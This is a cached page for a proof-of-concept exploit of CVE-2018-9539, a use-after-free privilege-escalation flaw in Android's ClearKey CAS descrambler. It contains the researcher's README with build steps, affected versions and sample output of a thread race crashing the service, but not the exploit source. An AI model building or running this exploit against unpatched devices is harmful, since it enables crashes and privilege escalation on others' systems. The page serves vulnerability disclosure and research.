CVE-2018-9539 PoC — Android ClearKey CAS descrambler 权限许可和访问控制漏洞

Source

https://github.com/tamirzb/CVE-2018-9539

Associated Vulnerability

Title:Android ClearKey CAS descrambler 权限许可和访问控制漏洞 (CVE-2018-9539)
Description:Android是美国谷歌（Google）公司和开放手持设备联盟（简称OHA）共同开发的一套以Linux为基础的开源操作系统。ClearKey CAS descrambler是其中的一个解扰码器。 Android 8.0版本、8.1版本和9版本中的ClearKey CAS descrambler存在提权漏洞。攻击者可利用该漏洞获取提升的权限（释放后重用）。

Description

 PoC code for CVE-2018-9539

Readme

# CVE-2018-9539

Proof-of-concept code for CVE-2018-9539

If you have any questions, you are welcome to DM me on Twitter ([@tamir_zb](https://twitter.com/tamir_zb)).

## Build

In order to build this:

1. [Download the Android source code](https://source.android.com/setup/build/downloading).
2. Put this repository in `AOSP/external`.
3. Run the following commands:

```
cd AOSP
source build/envsetup.sh
make cas_race_uaf
```

## Result

Running this PoC against an unpatched version of Android (8.1-9.0 before November 2018) should result in a use-after-free. Note that this PoC is not really intended to run on Android 8.1, as it expects the UaF to crash the service, which only happens in Android 9.0, so running this PoC on Android 8.1 will result in an infinite loop.

Here is an example output of running this PoC on Android 9.0:

```
Objects prepared

Attempt #1:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session2
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: session2
Thread #4 result: session2
Attempt #1 failed, retrying...

Attempt #2:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session2
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: session2
Thread #4 result: session2
Attempt #2 failed, retrying...

...
...
...

Attempt #204:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session2
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: session2
Thread #4 result: session2
Attempt #204 failed, retrying...

Attempt #205:
Sessions prepared
Descrambler session set to session1
Threads prepared
Running threads...
Descrambler session set to session2
Thread #0 result: session1
Thread #1 result: session2
Thread #2 result: session2
Thread #3 result: CRASHED :)

Succeeded in 205 attempts
```

File Snapshot


 [4.0K]  /data/pocs/290c55f3b2fa997bdc19b15a7080ae7d39113966
├── [ 353]  Android.mk
├── [7.4K]  cas_race_uaf.cpp
├── [ 34K]  LICENSE
└── [2.0K]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!